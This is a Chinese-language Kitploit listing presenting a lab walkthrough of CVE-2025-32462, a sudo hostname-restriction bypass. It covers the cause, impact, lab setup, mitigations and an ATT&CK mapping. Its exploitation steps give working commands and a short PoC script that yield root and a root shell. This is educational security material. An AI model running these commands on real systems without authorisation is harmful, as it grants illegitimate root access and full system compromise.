Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32462- — CVE-2025-32462是sudo中的本地权限提升漏洞 | Kitploit
工具/GitHubGitHub/offsecplaybook/cve-2025-32462-
权限提升漏洞分析漏洞利用渗透测试学习与教育实验室与实践
GitHuboffsecplaybook/cve-2025-32462-

CVE-2025-32462-

CVE-2025-32462是sudo中的本地权限提升漏洞

查看仓库
8个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-32462 – Sudo主机名绕过权限提升

CVE Cyber Security Penetration Testing Security Research

目录

  1. 概述
  2. 漏洞详情
  3. 影响
  4. 实验环境
  5. 验证受影响版本
  6. 用户与sudoers配置
  7. 利用演练
  8. 概念证明总结
  9. 为什么Ubuntu不受影响
  10. 缓解措施
  11. MITRE ATT&CK映射
  12. 参考
  13. 免责声明

概述

CVE-2025-32462 是一个 sudo 中的本地权限提升漏洞,允许低权限用户通过滥用主机名受限的sudo规则,以 root 身份执行命令。问题在于 sudo 在授权检查中历史上对 -h(主机)选项的处理方式。

当一条sudoers规则限定在特定主机名时,sudo 只应在系统主机名与该规则匹配时允许执行。由于逻辑缺陷,受影响版本信任通过 sudo -h 提供的用户指定主机名,使攻击者能够完全绕过这一限制。


漏洞详情

  • CVE ID: CVE-2025-32462
  • 类型: 本地权限提升
  • 受影响组件: sudo
  • 攻击向量: 本地
  • 所需权限: 低(非sudo用户)
  • 用户交互: 无

根本原因

sudo 允许 -h <主机名> 参数影响授权决策。在受影响版本中,所提供的宿主名在sudoers规则评估时被信任,而非严格对照系统实际主机名进行验证。

因此,基于主机的sudo限制可以被绕过。


影响

如果成功利用,本地攻击者可以:

  • 以 root 身份执行任意命令
  • 完全攻陷系统
  • 绕过管理安全边界

在实际环境中,此漏洞在以下场景中尤为危险:

  • 多用户系统
  • 使用主机特定sudo规则的加固环境
  • 堡垒机或跳板机

实验环境

组件详情
操作系统Debian 11 (Bullseye – 未打补丁)
sudo版本≤ 1.9.13
访问级别本地用户
虚拟化VirtualBox

⚠️ 注意: 现代Ubuntu和Debian版本已经向后移植了补丁,同时保留了相似的版本字符串。此漏洞无法在已修补的系统上复现。


步骤1 – 验证受影响的sudo版本

root@kitploit:~
sudo --version

预期(存在漏洞的):

root@kitploit:~
Sudo version 1.9.5p2

步骤2 – 创建低权限用户

root@kitploit:~
sudo useradd -m attacker
sudo passwd attacker
groups attacker

预期:

root@kitploit:~
attacker : attacker

用户不能属于 sudo 组。


步骤3 – 配置存在漏洞的sudoers规则

安全地编辑sudoers:

root@kitploit:~
sudo visudo

添加以下行:

root@kitploit:~
attacker prod-server = (root) ALL
  • prod-server 是一个假的主机名
  • 系统实际主机名必须不同

验证:

root@kitploit:~
sudo -l -U attacker

预期:

root@kitploit:~
User attacker may run the following commands on prod-server:
    (root) ALL

步骤4 – 确认正常的sudo被拒绝

切换用户:

root@kitploit:~
su - attacker

尝试正常执行sudo:

root@kitploit:~
sudo id

预期:

root@kitploit:~
attacker is not allowed to run sudo on <hostname>

步骤5 – 利用(CVE-2025-32462)

触发漏洞:

root@kitploit:~
sudo -h prod-server id

成功利用的输出:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root)

获取root shell:

root@kitploit:~
sudo -h prod-server /bin/bash

验证:

root@kitploit:~
id

概念证明总结

自动化PoC脚本(可选)

root@kitploit:~
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id

保存为 exploit.sh,赋予执行权限,并以 attacker 用户身份运行:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh
动作结果
正常sudo❌ 拒绝
sudo -h prod-server id✅ Root

这确认了成功的权限提升。


为什么Ubuntu不受影响

现代Ubuntu版本似乎搭载了处于受影响范围内的sudo版本。然而,Ubuntu已经向后移植了CVE‑2025‑32462的安全修复,而未更改上游版本字符串。

因此:

  • sudo -h 选项不再影响授权检查
  • 主机名欺骗被正确拒绝
  • 尽管版本号相似,漏洞无法复现

这凸显了使用行为测试而非仅凭版本字符串来验证漏洞状态的重要性。


缓解措施

  • 将 sudo 升级到已修补版本
  • 尽可能移除主机限制的sudo规则
  • 监控本地权限提升尝试

MITRE ATT&CK映射

  • TA0004 – 权限提升
  • T1548.003 – 滥用提升控制机制(sudo)

参考

  • CVE‑2025‑32462公告
  • sudo项目安全公告
  • Debian安全追踪器

免责声明

本演练仅用于教育和防御性安全研究目的。请勿在您不拥有或未获明确授权评估的系统上测试此漏洞。

下载工具